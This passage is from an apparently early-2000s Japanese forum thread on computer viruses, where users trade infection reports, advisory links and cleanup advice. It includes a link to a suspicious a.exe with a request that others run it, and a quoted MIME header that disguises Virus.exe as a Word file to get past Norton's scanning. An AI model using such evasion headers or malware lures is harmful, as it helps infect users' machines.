0637(゚ρ゚)アウアー
NGNGかなーり高度なポリモ積んでるみたいだからにょ。。
AVPとNAIだけか?一応対応してるの。
ドート君は優秀だの。
0638名無しさん@お腹いっぱい。
NGNGhttp://www.geocities.com/kendokobayashi1111/a.html
ここに置いてるa.exeってファイル
アングラサイトで拾ったんだけど、
かなりウイルスっぽいです。
でもウイルスバスタで検出できません。
だれか実行してみて
or
他のアンチウイルスソフトで試してみて
これなんですか?
0639XYZ
NGNG自作のセキュリティソフト試すんで
ハッキングかけてくれれば幸いなり
ヘボどもかかってきやがれ!!!
0640チューボー
NGNG誰か送ってきてくれないかな?
けっこうHDとかボロボロにするくらい強いやつが希望
0641名無しさん@お腹いっぱい。
NGNGwinmxをやれ。
メールアドレス書き込むだけでウイルスが送られてくるはずだが。
Sircam Hybris など
0643名無しさん@お腹いっぱい。
NGNGおまえのメアドじゃないだろ
0644名無しさん@お腹いっぱい。
NGNG山長って代官山にあるって聞いたんですが、具体的にどこらへんにあるのでしょうか?
0645名無しさん@お腹いっぱい。
NGNGヘッダみないで実行するバカがひっかかりそうな内容だった
0646cheshire-cat
NGNG6日にinstall.exeをダブルクリックすると、winkqlu.exeなんて名前のができた。
起動時にしっかりと動いている。
ところがいつまで待っても、ファイル上書きしてくれない。
さっきまたやってみた。
Win2k パッチ全く無し、FAT32だったんだけど。日付を5日23時50分くらいにして。
6日になっても、何回再起動しても、ファイルをあぼーんしてくれなかった。
だから何ともいえないんだけど、メモ帳で破損jpgファイル開いて、どういう状態なのか確かめてみてはどうだろう。
0647cheshire-cat
NGNG0648別スレ351 ◆enghYAOw
NGNG…変な文字が出てくるだけでな〜んにも分かりません。
どうなってれば大丈夫で、どうなってれば大丈夫じゃないんですか?
0649名無しさん@お腹いっぱい。
NGNGやってくるんだけど他でもそおなん?
昨日からこなくなったけど。
中継鯖つぶれたかな?
0650cheshire-cat
NGNGハカーイ後のjpgファイルと、他から拾ってきたハカーイ前のjpgファイルを比べるとか。
同一なのに開けないなら、他の要因を考えましょうか。
違うなら、ハカーイかと。
Symantecにて、0で埋め尽くすとか書いてたけど、再現できずに実物見れてない。
どう?同じ文字ばっかりがずらーっと並んでる?
なんだか息の長いやり取りですね、互いに。
0651別スレ351 ◆enghYAOw
NGNGでもハカーイ後のファイルには必ず「run is Dos mode」の文字が…
やっぱハカーイされてるんでしょうか…
>なんだか息の長いやり取りですね、互いに。
じゃぁ、これからメールでやりとりさせてもらってもいいですか?
0652cheshire-cat
NGNGあまりメルは頻繁にはチェックしないから、遅レスになると思うけど。
気になって洋モノjpgを幾つかチェックしたけど、run is dos modeって文字は無いし。
やっぱりハカーイされている可能性が大だと思う。
元々全く同じ画像ならば、それぞれ比較すればいいかと思って。
開けなくなったjpgと、それと同じもので開けるjpgってあるでしょ。
例えば壁紙とか、どっかのサイトからすぐ拾える(容易にもう一度入手できる)jpgとか。
それらに、「開ける123.jpg」「開けない123.jpg」って、名前をつけて、送ってみそ。
0653名無しさん@お腹いっぱい。
NGNG二つ見つかったんだけど。(どっちも、Win32.ZMist)
\Program Files\Common Files\ASG Shared\ADDRDIC\PMLTDB32.DLL = ウイルス感染 : Win32.ZMist
\WINDOWS\TEMP\s3vv18ph.DLL = ウイルス感染 : Win32.ZMist
上にも書いてあったけど、これって…。
とりあえず隔離したところ、ゾーンアラームがなんか変な具合になりました。
(起動すると英文で”TrueVectorを探しています、キャンセルしますか?”みたいなことを聞いてきてキャンセルボタンを押してもおさなくても、ZAのアイコンがXマークになる。)
で、ネットにつながらないので、s3vv18ph.DLL だけ元に戻して今書き込んでます。
とりあえず、どのように対処したらいいっすか?
(このウイルス?の情報って、英語の奴を読んだだけなんだけど、あまり情報ないっすね)
0654名無しさん@お腹いっぱい。
NGNGヲイヲイ、感染したファイルを戻すなよ。普通、Zoneを殺すだろ。
0655cheshire-cat
NGNG今回はMcAFEEの方が詳しかった。もう見たならスマソ。
http://vil.mcafee.com/dispVirus.asp?virus_k=99382
0656653
NGNGレスどうも。それ、昨日読んだんですが…
とりあえず、どうすればいいんでしょう??
マカフィでは削除できるみたい?
ノートン先生では、「検疫」すら出来ませんでした。
アンチドートは削除できない簡易版なので。
0657cheshire-cat
NGNGそれと同じファイルがあるなら、メルで送ろうとしたんだけど、無かった。
何のアプリで使っているファイルなのかわかるなら、654の人のレスに従って、それと同じファイルをもらってきて上書きとか。
>ノートン先生では、「検疫」すら出来ませんでした。
ポリモかかっているから、検出しずらいのかもなー。
それが「ガイシュツ」、の古いバージョンとは限らないし。
製品版買えばいいのに。
でもやっぱり漏れなら、しつこそうなVilliだからOSクリーンインストールする。
0658名無しさん@お腹いっぱい。
NGNGNorton Anti Virus2001によると、アプリの一部がBackdoor.Trojanに感染
しました。修復不可で検閲に隔離されています。
ウイルスが特定されていても、修復できないもんなのでしょうか。又、当方
Meですがシステム復元のチェックを一旦外した方がいいのでしょうか。
0659名無しさん@お腹いっぱい。
NGNG今日データ更新したら、やたらと長くかかり、その後
W32/Zmist検出せず。
やっぱり誤検出だったみたい。
近々、簡易版も更新されると思う。
0660cheshire-cat
NGNG>システム全体のスキャンを実行し、Backdoor.Trojan として検出されたファイルをすべて削除
こんなの書いてるけど。削除すればいいのに。ウイルスそのもののファイルを修復できる訳もなく。
http://www.symantec.com/region/jp/sarcj/data/b/backdoor.trojan.html
0661653
NGNG>659
誤検出ってことは、このまま何もしなくてもオッケーってことですよね?
なんかホッとしたと同時に、
ウイルスに対する警戒心が増す今日この頃…。
0662cheshire-cat
NGNG誤検出かぁ。
ハードディスクの空き容量が食われるんです。
最初は、500MBの空き容量。これがほとんど0まで
食われる。で、電源切ってしばらくすると、
もとの空き容量(500MB)に戻るんです。
これはいったいなんでしょうか。Norton
つかってスキャンしてもなにも反応なし。
ですが、ハードディスクの容量が食われる。
0664名無しさん@お腹いっぱい。
NGNGせめて OS 名くらい教えてくれ・・・
アドバイスが出来ないヨ
0665名無しさん@お腹いっぱい。
NGNGトレンドマイクロのオンラインウィルススキャンを使おうとしたのですが
更新ファイルダウンロード中にエラー7が出てダウンロードできず
ウィルススキャンできませんでした。
何故だかわかる方、教えてくれませんでしょうか?
0666名無しさん@お腹いっぱい。
NGNGエラー7って何?
もっと詳しく書いて。
エラーさぐってる暇があったら製品版を買いに走れ
0668665
NGNG「サーバーが使用中か、ネットワークトラフィックが原因だと思われます。」
と言うメッセージ、
エラーコード:7
エラーストリング:アップデートできませんでした
と言われます。
再試行しようとしたら途中で終わってしまい、ウィルス検索できません。
0669名無しさん@お腹いっぱい。
NGNGMe?
0670名無しさん@お腹いっぱい。
NGNGそういう事はWin板で聞け。んでもってウィルスかも? といわれてから来い。
0671名無しさん@お腹いっぱい。
NGNG大丈夫ですか?送った本人は送信した覚えがないっていうんだけど。
一応ウイルスバスターではひっかからなかったんだわ。
親切な人教えてください。
0672名無しさん@お腹いっぱい。
NGNGもしかしたらWindowsをC:以外にインスコしとるだろ。
それを解決するにはレジストリをいじるしかない。
俺はそれでうまくいった。
0673名無しさん@お腹いっぱい。
NGNG>100以上のメールが添付されたメール
???意味不明。
もっと詳しく書いて。
0674cheshire-cat
NGNGそれ、欲しい。是非。
0675名無しさん@お腹いっぱい。
NGNG常識で考えて大丈夫なわけないだろ(送った本人も心当たりがないんだし)
0676cheshire-cat
NGNG0677671
NGNGあと
本人のメアドが件名に表示されていた。
送信先アドレスは添付ファイルのアドレスと同じらしい。
心当たりのあるウイルス名を教えてください。
こっちのPCは最新パターンで検索しましたところ問題なさそうです。
0678671
NGNG0679名無しさん@お腹いっぱい。
NGNG書いたままなのは分かるが、そっちが何を書こうとしてるのか分からんのだ。
メールにメールが 100 通添付されてたと思っていいのか?
0680名無しさん@お腹いっぱい。
NGNGhttp://news.2ch.net/test/read.cgi/newsplus/1015938003/l50
0681671
NGNGそうです。メールに添付ファイルとしてメールが100以上添付されてました。
そのメールはメモ帳で開いてみると、どうも相手のPCに保存されている
メールのようです(ヘッダー見る限り)日本語本文は文字化けでみれません。
凶悪なブラクラに引っかかったのかなとも思いますが。
0682名無しさん@お腹いっぱい。
NGNG0683cheshire-cat
NGNG添付のメルファイル以外には、添付ファイルは無かった?
ということは、HTMLメール?
0684名無しさん@お腹いっぱい。
NGNGウィルスにメールから感染してしまったみたいです。
「Entry-point-obscuring」を使用した32bit形式実行可能ファイル(PE形式)感染型ウイルス
というらしく、(ネットでやっと調べられました・・。)
やはり市販の駆除ソフトなどを買わなければならないのでしょうか。
どなたかウィルス駆除に詳しい方、宜しくお願い致します。
0685671
NGNGはいメールファイルだけです。nextpartで区切られた。
ひとつひとつの添付メールは
------=_NextPart_*********************(*はランダム数列)
で区切られている。
また、タグらしきものは入ってませんでした。
0686cheshire-cat
NGNGhttp://www.symantec.com/region/jp/sarcj/data/w95.mtx.fix.html
けどね、いくつかのファイルはもう破損していて修復不能だよ。
駆除成功しても、これから先、頻繁に画面が固まったり動作不良になるかと。
OSクリーンインストールをお勧めします。
0687名無しさん@お腹いっぱい。
NGNGサポートが必要なら店で買ってきたほうが自分も幸せ。周りも幸せ。
0688cheshire-cat
NGNG謎だね。まさかメーラーが壊れていたってオチなんだろうか。
新種!って喜んでいたのに。悲しい。
感染活動を行わない、ワームっぽくないVilliって、存在意義無さそうだし。
0689671
NGNGまだ感染してないともいえませんよね?新種なら。
0690671
NGNG0691名無しさん@お腹いっぱい。
NGNGいや、送られてきた(添付でないほうの)メールの内容が
HTMLでなくて、且つ、添付されてきたファイルのヘッダーとかに
異常がなければ、メールが感染経路でない事は分かる。
ちなみにどちらから送られてきた?
0692cheshire-cat
NGNG数日後にシマンテックあたりで掲載されていたら、やだね〜
漏れの経験則なんだけど。
添付ファイルが怪しくなくて、メール本文に変なコードが無ければウイルスじゃない。
でも本文じゃなくて、添付のメルファイルに挿入されていたら、やだね。
とりあえず、「もし本当にウイルスだったら」、という前提で。
受信ボックスのメールを全てエクスポートして、それから受信ボックスのメールを全て削除。
アドレス帳をエクスポートして、登録されているアドレスを削除(もしウイルスがこれから情報を得ているなら、知人に被害を及ぼすから)。
これって「過剰な反応というかやりすぎ」、かもしれないけど。
でも本文、怪しくなかったんしょ?ならいいような気もする(実物見てないから自信ないけど)。
0693671
NGNGPCには詳しくない知り合いからです。
アウトルックも古いバージョンでした。
X-Mailer: Microsoft Outlook Express 5.00.2314.1300
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300
私のメアドがアドレス帳にあったからだとおもいます。
で、アドレス帳にあるすべてに送信したと思いますが、
そいつのアドレス帳が見れないので送信先と一致するか否かは不明です。
>>692
ありがとうございます。
ご教示いただいた対策一応やっておきます。
0694cheshire-cat
NGNG漏れが書いた対策って、「やりすぎじゃないかな〜」って思うけど。
でもアドレス帳、便利だけど使わないほうがいいよ。
これを標的にしたのが多いから。
0695名無しさん@お腹いっぱい。
NGNGそこまでやるなら、OE捨てたほうがいい。
0696名無しさん@お腹いっぱい。
NGNGa vexのプロテクトCDを入れると
自動的にレジストリが書き変わる等して
不具合も起こる可能性がるそうです
0697名無しさん@お腹いっぱい。
NGNGサブジェクトが英語なり文字化けなりのメールがいくつか来ました。
定義ファイル最新のバスターもノートンも通過。
保存して中を覗いてみると、添付ファイルの拡張子がそれぞれ
bat,xls,doc、でReturn-Pathがロシア宛。
なんだかやけに怪しくないでしょうか?
0698cheshire-cat
NGNGアドレス帳使わず、パッチ当てればいいメーラーだと思うけど。
HTMLメールよく使うんで。
確かに各種villiの攻撃対象だわな。
0699cheshire-cat
NGNGxlsやdocはともかく。
batはさ、ちょっとした小物を仕込んでも検出されなかったりするよ。
0700名無しさん@お腹いっぱい。
NGNG「3c8e1aaf.html」が添付されたメールが来たのですが、これが
今の流行ですか?
0701697
NGNGどんな小物がどう動きそうなのか、見当もつきませんが
(自分でバッチファイル書いたこともないものですから)
検出されなくても用心することにしますね。
どうもありがとうございます。
0702名無しさん@お腹いっぱい。
NGNG攻撃されるだけならいいけど、簡単に加害者になれるのはちょっとね。
0703名無しさん@お腹いっぱい。
NGNGなるほどつい開きたくなるな
0704通行人
NGNGhttp://210.212.212.130/
クリックしても大丈夫ですか?つーか、したいんですけど。
0706名無しさん@お腹いっぱい。
NGNGそういう時はココで聞け。
http://ex.2ch.net/test/read.cgi/entrance/1015927791/l50
鑑定依頼は age 且つコメントつきで。
0707通行人
NGNG逝く時はウイルススキャンで見張りを忘れずに。
0708663
NGNGすいません。最近忙しくて返事遅れました。
OSはWin98です。起動して3時間後ぐらいから、
ハードディスクが埋まりはじめます。
でも、まずWin板で聞いてみます。ありがとうございます。
0709名無しさん@お腹いっぱい。
NGNGSubject: Internet Security Update
From: "Microsoft Corporation Security Center" <rdquest12@microsoft.com>
To: "Microsoft Customer" <'customer@yourdomain.com'>
というメールが届いてます。 q216309.exe という添付ファイルが付いてます。
で、見知らぬメールサーバーから
A message from Willard_Ireland@mazer.com with the subject
Internet Security Update was not delivered to you because
it was suspected of containing a virus.
というメールが届きました。
メールは UNIX で読んでるので実害は無いのですが、
こういうのって、どっかに通報すべきですか?
0712名無しさん@お腹いっぱい。
NGNGありがとうございます。
>>711
まさにそれみたいですね。
0713名無しさん@お腹いっぱい。
NGNGつい出来心でウイルスを実行してしまいました。
オンラインスキャンによると“W95.Hybris.gen”のようです。
Windowsが使用しているWsock.DLLを書き換えてしまい、削除できなくて困っています。
どうすれば良いでしょうか?
0714もうだめぽ!
NGNGあきらめて、フォーマットしなさい
0715名無しさん@お腹いっぱい。
NGNGマジすか!
もう少し待ってみて、やはり有効な対策がないと諦めが付けばフォーマットします。
誰か良い案ないですか?
0716名無しさん@お腹いっぱい。
NGNGWindowsが使用しているファイルの削除方法が分からんと言われちゃ
方法を提示してもまともな駆除は望めない
だからフォーマットしてもらうのが最善策なんだが
0717名無しさん@お腹いっぱい。
NGNGと、とりあえず方法だけでも示して頂けませんでしょうか?
0719名無しさん@お腹いっぱい。
NGNGでも、結局「ノートン使え」としか書いてませんでした。
やはりフォーマットしかないのでしょうか・・・
0720cheshire-cat
NGNGで、どのバージョン?そのHybris。
アンチウイルスソフトの名前を書いてくれないと、変種が多い奴はレス付けづらい。
自分がレスしたのと違うバージョンだったら嫌だし。
だってアンチウイルスソフトごとに検出名が異なるって、よくあること。
どんぞ。参考までに。
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_HYBRIS.A
0721名無しさん@お腹いっぱい。
NGNGトレンドマイクロの自動修復ツール、どうもありがとうございます!
これでどうにかなりそうです。
まずは細かいバージョンを調べてきます。
重ね重ねありがとうございました。
0722名無しさん@お腹いっぱい。
NGNG「お宅からウイルスが届きました」というメールが来ました。
私は出した覚えがないので出していませんがという
メールを送ったのですが、その方も私に送った覚えがないと・・・
その人の所には1時間の間に3000通のメールが届いたそうです。
今日は別の人からお宅から苦情メールが届くんだけどというメールを貰ったのですが、
出した覚えが全くない人からです。
ノートンを常駐させていて、Trend Microのオンラインスキャンもかけましたが
ウイルスに感染はしていませんでした。
上に書いたメールには添付も何もありません。
これって誰かがウイルスにかかっていて、それが勝手に届くと言うことなのでしょうか?
全く見知らぬ人からなので気持ちが悪くて・・・
どなたか何か知っていれば教えて下さい。お願いします。
0723cheshire-cat
NGNG感染しているのは相手の方という説も。またウイルスが送信者をごまかしているとか。
また誰かが君を装って意図的にメル送ってる可能性もあるかと。
相手に連絡して、送信者のメールヘッダから、IPアドレスを見てみ。
0724名無しさん@お腹いっぱい。
NGNG削除したいファイルの名前は分かってるの?
DOS の起動ディスク作って DOS で起動してから del コマンドで削除とか。
0725722
NGNGありがとうございます。
一人の方のメルアドは、プロバにこの方ウイルスにかかっているかも
しれませんよと報告したんです。
他のメールはは大学でした・・・
私は大丈夫だと安心しても良いんでしょうか?
一度IPアドレスを調べてみます。
0726名無しさん@お腹いっぱい。
NGNG送信元アドレス、IPアドレス、中継MTA、メーラー、そのバージョン
そのあたりを正規のものと比較すれば良いんじゃないかな?
0727713
NGNGなるほど。
Windowsで保護されてるファイルも、DOSで起動すれば
delコマンドで削除できるわけですね。
役に立ちそうなので覚えておきます。
問題自体は解決できました。
0728cheshire-cat
NGNG>私は大丈夫だと安心しても良いんでしょうか?
うんにゃ。
君のパソコンが、未知Villi感染中って可能性もある。
メーラー使わずにsmtp機能内蔵で自力でメル出すウイルスなら、メーラーにログは残らなかったりするだろうし。
もっとも単純な手だけど、そのパソコンを使わないで放置とか。
そしてその間に相手にメールが届いたんなら、君じゃない、確実に。
まずは相手に時刻と送信元のIPアドレスの問い合わせを。
それから次の手を考えましょうか。
0729名無しさん@お腹いっぱい。
NGNGいや、システムファイルに取り付くとdelだけを覚えても対処できない
attribとかextractとかも覚えておく必要がある
修復できたか、よかったな
0730713
NGNG良い機会なのでDOSコマンドを勉強してみます。
0731722
NGNG何度もありがとうございます。
一人の方に問い合わせてみました。
すぐに返事をくれたのですが私のメルアドからは届いていないらしいのです。
その方がウイルスを送ってきた相手にメールを出しただけで他の人には
一切送っていないとのこと・・・
私に送られてきたメールと同じ内容のものをその人に送ったらしいのです。
意味が判りにくいかもしれませんが、一人の人に送ったメールが何人もの人に
ばらまかれていると言うことなのでしょうか?
0732cheshire-cat
NGNGそのウイルスの名前が知りたいんだけど。
それともメーラーの設定使ったんだろうか、あ、独り言です。
0733名無しさん@お腹いっぱい。
NGNGそういえばそうだな。
フォローありがと。
0734722
NGNG「W32.Alcarys.D@mm」これらしいです。
二つのメルアドから送られてきたらしいです。
そしてその人にメールを出したらしいのですが、
そのメールが私の所にも届いたと言うことなんです。
何か文字で説明していると訳がわからなくなってきました。
ごめんなさい。
0735名無しさん@お腹いっぱい。
NGNGまだ見てたらだけど。
それ以前に、DOSの起動ディスクの作り方は知ってる?
知らないんならついでに聞いて。
0736722
NGNG0737cheshire-cat
NGNGアルカリスDは、情報がほとんどまだ出ていない。
実物がないので、ちょっとギブ。お力になれずスマソ。
まずはこれを(もう見たかな?)。
とりあえずアンチウイルスソフトもそうだけど、一応念のためファイル名で検索して感染チェックを。
http://www.symantec.com/region/jp/sarcj/data/w/w32.alcarys.d%40mm.html
最初、表示される送信元アドレスを偽装するのは簡単だから、君を装ってメール出したのかと思ったんだけど。
送信者の項目、数日後にはSymantecあたりで詳細情報出るかも。うーん。
0738722
NGNG本当にありがとうございます。
私Outlookも使っていないし、ノートンを8日にちゃんとウイルス定義も
最新版にしているんです。
と言う事は私は何ともないと喜んでも良いと言うことですよね。
色々聞いてくれてありがとうございました。
0739名無しさん@お腹いっぱい。
NGNG0740名無しさん@お腹いっぱい。
NGNGシャットダウンしてしまうのですが、
これってウイルスに感染しちゃったんですか?
0741名無しさん@お腹いっぱい。
NGNGここで質問するより前にアンチウィルスソフトを買ってきなさい。
それが済んだ上でまだ不安ならここで質問しなさい。
0742名無しさん@お腹いっぱい。
NGNGウィルス検索はしましたか?話はそれからですが。
0743名無しさん@お腹いっぱい。
NGNGここを見てこい。
http://www.google.com/search?hl=ja&q=IMEJPKNL%2CDLL%83G%83%89%81%5B&lr=
0744ナマでパコパコ!!!!
NGNGインターネット=ソープランドのマンコ
パソコン=チンコ
これでもナマでヤリますか?
淋、蔵まみれになりますか?
0745名無しさん@お腹いっぱい。
NGNGノートンには引っ掛かりませんでした
0746sasa
NGNGどなたか詳しくご存知のかたはいませんか?
0748dj
NGNGpatch.exe はうちにも来てます。ファイルサイズは 43,836 bytes
ですが、何なのかよく分からない。
メモ帳で開けてみると、Content-Transfer-Encoding: BASE64 と
書いてあるので、それ自身でメールを発信するのかもしれない。
0749748
NGNGhttp://pc.2ch.net/test/read.cgi/sec/1014116411/531-
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_FIDAO.A
0750名無しさん@お腹いっぱい。
NGNGttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_FIDAO.A
今日現在、トレンドマイクロ以外未対応のようだす。
0751名無しさん@お腹いっぱい。
NGNGhttp://www.symantec.com/region/jp/sarcj/data/w/w32.qint@mm.html
0752名無しさん@お腹いっぱい。
NGNG0753名無しさん@お腹いっぱい。
NGNG0754Norton AntiVirusに、複数の脆弱性が発見された。
NGNG二つ目は、NullキャラクターがMIMEタイプに含まれている場合、ウイルスが検知が出来ないという問題。
三つ目は、RFCに準拠していないMIMEフォーマットの中に悪意のあるコードが含まれている場合、
ウイルスの検知動作がストップしてしまう問題。
これらにより、MIMEヘッダーのContent-Typeで、applicationとattachmentを操作されたファイルが
検知されないため、Wordなどのマクロウイルスが検知されずに実行されてしまう。ウイルスメールが検知されず、
トロイの木馬が仕込まれる。スキャン動作が停止されるため、ウイルスメールを受信してしまうなどの問題が発生する。
0755Norton AntiVirusに、複数の脆弱性が発見された。
NGNGSymantec Norton AntiVirus Conflicting MIME Header Vulnerability
http://online.securityfocus.com/bid/4246
SecurityFocus
Symantec Norton AntiVirus Excluded Filetype Email Protection
Bypass Vulnerability
http://online.securityfocus.com/bid/4245
SecurityFocus
Symantec Norton AntiVirus NULL Characters Incoming Email
Protection Bypass Vulnerability
http://online.securityfocus.com/bid/4242
SecurityFocus
Symantec Norton AntiVirus Non-RFC Compliant Email Protection
Bypass Vulnerability
http://online.securityfocus.com/bid/4243
SecuriTeam.com 2002/03/14 追加
Various Vulnerabilities in Norton Anti-Virus 2002
http://www.securiteam.com/windowsntfocus/5PP0B0U6KU.html
0756Norton AntiVirusに、複数の脆弱性が発見された。
NGNGhttp://www.securiteam.com/windowsntfocus/5PP0B0U6KU.html
Content-Type: application/msword;
name=\"Virus.nch\"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
filename=\"Virus.exe\"
0757名無しさん@お腹いっぱい。
NGNG0758名無しさん@お腹いっぱい。
NGNG初心者ちゃんはPC初心者板へ
コンピュータウィルス総合スレッド VOL.15
http://pc.2ch.net/test/read.cgi/pcqa/1015798305/
0759うんこ
NGNGこのワームは WORM_FBOUND.B に名称が変更されました。
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_JAPANIZE.A
W32.Impo.Gen@mm
2002年3月14日、W32.FBound@mmからW32.Dotjaypee@mmへ、そしてW32.Impo.Gen@mmに
ウイルス名を変更しました。
テクニカルノート:
メールアドレスの最後が .jpの場合、件名は以下の17種類のうちの中からランダムに送信されます。
件名:
重要
Re:重要
重要なお知らせ
Re:重要なお知らせ
例の件
Re:例の件
お久しぶりです
Re:お久しぶりです
こんにちは
Re:こんにちは
極秘
Re:極秘
資料
Re:資料
蛙
ウャR
うんこ
http://www.symantec.com/region/jp/sarcj/data/w/w32.impo.gen@mm.html
http://www.nai.com/japan/virusinfo/fbound.asp
0760名無しさん@お腹いっぱい。
NGNGウチの会社でも引っかかってたのいたなぁ。
前者に迅速に警告メール出してたのは誉めたるけど、しかし、
俺に言わせれば、添付の EXE ファイルダブルクリックする奴が気が狂ってる。
0761名無しさん@お腹いっぱい。
NGNG添付ファイルの付いていないメールが届きまして、開けようか止めようか迷っています。
題名は「Thank you」で、送り主のメアドのドメイン名?は @yahoo.com です。
もしかしたら知人からのメールかもしれないので削除して良いものかどうか・・・・・・
メールに添付ファイルが付いていない場合でも、ウイルスに感染する可能性は有るのでしょうか?
どなたかご存じの方がいらっしゃいましたら、お答えくださると幸いです。
0762cheshire-cat
NGNG>メールに添付ファイルが付いていない場合でも
あるよん。Bubble Boy(日本語環境では動かない)とか。またhtmlメルに埋め込みとか。
0763名無しさん@お腹いっぱい。
NGNG使っているメーラーを教えてください。話はそれからです。
一言で言うと、Outlook Express と Outlook の場合は、設定によっては
問答無用でウィルスに感染します。
0764cheshire-cat
NGNGOEやOutlookのセキュリティを制限サイトにしていない人が多いのは、空しいよね。
0765名無しさん@お腹いっぱい。
NGNG0766名無しさん@お腹いっぱい。
NGNGおっしゃる通りです。
まぁ、XML のセキュリティホールみたいなのもあるんで、何をどうしようが
やられる時やられるというのが現状ですが。
・・・今思いつきましたが、もしかして、XML の穴、OE でもやられる?
0767cheshire-cat
NGNG多分Hybris.B
英語のアルファベット8文字で、最初の2文字と最後の2文字が同じだから。
0768名無しさん@お腹いっぱい。
NGNGウイルスの可能性はありますか?ちなみに
デジカメとインターネットセキュリティを
こころみましたところ『不正操作を行なったため
終了します』みたいなことが表示されます。
0769cheshire-cat
NGNGXMLって何かの暗号化の技術だっけ?
漏れよく、というか全く知らない。
0770名無しさん@お腹いっぱい。
NGNGhtmメール見たいなんですけど。
送信しても大丈夫なのかな?
送信先はMELAD <happy@melad.jp>です。
世直し平成の水戸黄門
正しい世論を喚起し、明るく豊かな新しい日本を創造する
日本国民の最も関心度の高い問題意識に対する
(現金で10万円が当たる抽選券付)
緊 急 世 論 調 査
次のテーマーについてあなたの意見を世論調査に反映させ
新しい日本の創生企画に参画しましょう。
------------------------------------------------------------------------
今、国会を騒がしている、鈴木宗男議員についてあなたのお考えをお聞かせください
------------------------------------------------------------------------
緊急世論調査
鈴木宗男氏は衆議院議員を辞職すべきだ
賛 成 分からない 反 対
0771名無しさん@お腹いっぱい。
NGNGHTML をデータベース目的に変形させたようなものです。
ブラウザで見ることもできるのですが、バグのため、一部の
タグに囲まれた範囲が、エリア指定に関らず、ローカル権限
で実行出来るという離れ技が、離れ技が・・・。
0772cheshire-cat
NGNG漏れなら返信しない。
0773cheshire-cat
NGNGそれって素敵(らぶ
IEの別窓から危険スクリプト実行する奴以来のヒットかも。
メモしておきます。
0774761
NGNGお恥ずかしながら、未だにOutlook Expressを使っております(汗
ただビューウインドは、先だってのウイルス騒ぎに懲りて開いていません。
最近、普通のメールを装ったウイルスメールが多いらしいので、今回も警戒した方がいいかな、
と思いましてお聞きした次第です。
お手数お掛けしますm(_ _)m
0775名無しさん@お腹いっぱい。
NGNG私のいい加減な説明よりも、このへん見るとイイです。
ttp://www.asahi-net.or.jp/~ki4s-nkmr/mswatch41.html
0776名無しさん@お腹いっぱい。
NGNGでは、私も止めときます
(現金で10万円が当たる抽選券付)←この辺がちょっと胡散臭いんで
0777cheshire-cat
NGNG感謝。
勉強しておきます。
その下の、mp3とMediaPlayarの奴、気になるね。
先週ZD-Newsに以前載っていた奴だっけ?
今エクセプションを使ったエロサイトが増えたんで、報告例がトレンドだかで2番目らしいけど。
それ使えば、容易かもね。
0778名無しさん@お腹いっぱい。
NGNGしかし、どこをどうしたら、世論調査と 10万円の抽選券が結びつくんだ?
胡散臭さ大爆発。
0779名無しさん@お腹いっぱい。
NGNGZDに載ってた奴です。
データファイルそのものにはウィルスはとりつけない
(正確には、とりつけるけど発病出来ない)
という世の中の常識を一気に覆した、ある意味記念すべき
セキュリティホールです。
0780cheshire-cat
NGNGアンケート系のメール、怖いよね。
ネット初心者の人には、躊躇無く、住所や氏名、生年月日や電話番号書いちゃう人もいるし。
もっとも手軽な個人情報抜きだよね。
0781cheshire-cat
NGNGデータファイル感染Villi、漏れ的にはPDFとFlashのは革新的だった。
それだけスキルと情報抱えているなら、固定HN名乗ればいいのに。
そうすれば一過性の人格じゃなくて、永らく付き合えるような気が。
0782名無しさん@お腹いっぱい。
NGNGセキュリティホールとかはある程度詳しいですけど、ウィルスは
門外漢なので。
つまり、スレ違いの話題が多くなりそうなので、必要な時だけ出
てきます。
0783cheshire-cat
NGNG漏れも自分がよくわからない所の質問はレス書かないし。
そゆスタンスでいいかと。
0784便器
NGNGもし、「うんこ」ってタイトルでメールが来たら、
送り手に、便器を添付で送ってください。(´Д` )ノ
ご自由に、↓検索欄に、「便器」と書いて、画像をお探しください。(藁
Google イメージ検索
http://www.google.com/imghp?hl=ja
ちなみに、送り手のアドレスは、最初の文字が空白になっているので、
空白分を削除して直さないと返信でません。
0785名無しさん@お腹いっぱい。
NGNG送り手も、無知が故の被害者の可能性があり、あまりお薦めしません。
0786名無しさん@お腹いっぱい。
NGNGGoogle でそのメアドちょこっと検索したが、
http://www.benham.net/pipermail/debbugs/2002-January/
こんな感じのが出てきた。
なんのページだか分からないし、該当箇所クリックしてもエンコード
が変で内容読めないが、はっきり言って、まっとうな連中とは思えん。
0787名無しさん@お腹いっぱい。
NGNGそれと、内容的には、「反対・賛成・その他」を書き込ませるだけのもの。
何が目的かっていうと、多分、
・送信元はメールアドレスを大量に持っている(多分、10万単位で)
・しかし、そのうち、生きている(現在使われている)アドレスが分からない。
・そこで、片っ端から、このメールを投げる
・真面目に返信してきたら、それは生きているメールアドレス
・生きているアドレスが分かったら、そこ宛てに、オンラインカジノやらポルノやら
億万長者になる方法やらのメールを送信(広告)。死んでるアドレスに投げると宛
て先不明で返ってきて処理に困るから。
0788名無しさん@お腹いっぱい。
NGNGこれは、「ふるい」と呼ばれるアドレス選別方法で、縄文時代くらいからある
古典的な方法。携帯メールで問題になって、NTTが(的外れな)対策方法を
実践しようとしているはず。
0789名無しさん@お腹いっぱい。
NGNGもうひとつ、「10万円の〜」というのと、アンケート形式をとっているのは、
!広告!を件名表示に義務つける法改定の抜け穴を探しただけだと思う。
0791名無しさん@お腹いっぱい。
NGNGBADTRANS_Bのことかな?
機能ならダイレクトオープンだよ
0792名無しさん@お腹いっぱい。
NGNG「どういう機能を利用して」の部分がよく分からないのですが、
何を知りたいのでしょうか?
それと、BADTRANS_Bは、ウィルス活動(感染)は行わずに、ワーム
活動のみなので、厳密に言うとウィルスとは呼ばなかったりします。
0793790
NGNGJavaScriptとか、ActiveXとかそういうことです。
確か一年位前に初めて出現したような記憶があります。
0794名無しさん@お腹いっぱい。
NGNG1) スクリプトを埋めこんだHTMLメールを用意します
2) Outlook Express または Outlook で受信します。
3) アウトルックで、HTMLメールの件名をクリックします。
4) OE または Outlook では、HTMLメールをプレビューモードで開きます。
5) OE または Outlook は、HTML メールを読む時は、IE を内部的に呼びます。
6) IE が埋めこまれたスクリプトを実行。
